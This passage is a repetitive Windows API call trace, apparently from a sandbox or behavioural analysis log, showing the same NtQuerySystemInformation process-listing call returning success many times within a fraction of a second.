NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, 